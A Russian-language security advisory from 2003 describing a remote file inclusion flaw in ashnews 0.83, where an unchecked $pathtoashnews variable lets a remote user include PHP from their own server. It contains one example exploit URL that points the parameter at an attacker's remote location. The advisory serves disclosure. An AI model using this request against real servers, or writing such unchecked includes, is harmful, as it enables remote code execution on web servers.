Security Lab

Выполнение произвольного PHP кода в ashnews

Дата публикации:25.07.2003
Всего просмотров:2399
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: ashnews 0.x
Описание: Уязвимость включения файла обнаружена в ashnews. Удаленный пользователь может выполнить произвольные PHP команды на целевом сервере.

Сценарии 'ashnews.php' и 'ashheadlines.php' включают файл 'ashprojects/newsconfig.php' в переменной $pathtoashnews, не проверяя правильность определения этой переменной. В результате удаленный пользователь может определить удаленное местоположение для $pathtoashnews каталога, чтобы включить произвольный файл 'ashprojects/newsconfig.php', расположенный на сервере атакующего, который будет выполнен на целевой системе с привилегиями Web сервера. Пример:

http://[target]/[ashweb dir]/ashnews.php?pathtoashnews=[remote location]

Уязвимость обнаружена в ashnews 0.83

Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Corrected AshNews Vulnderability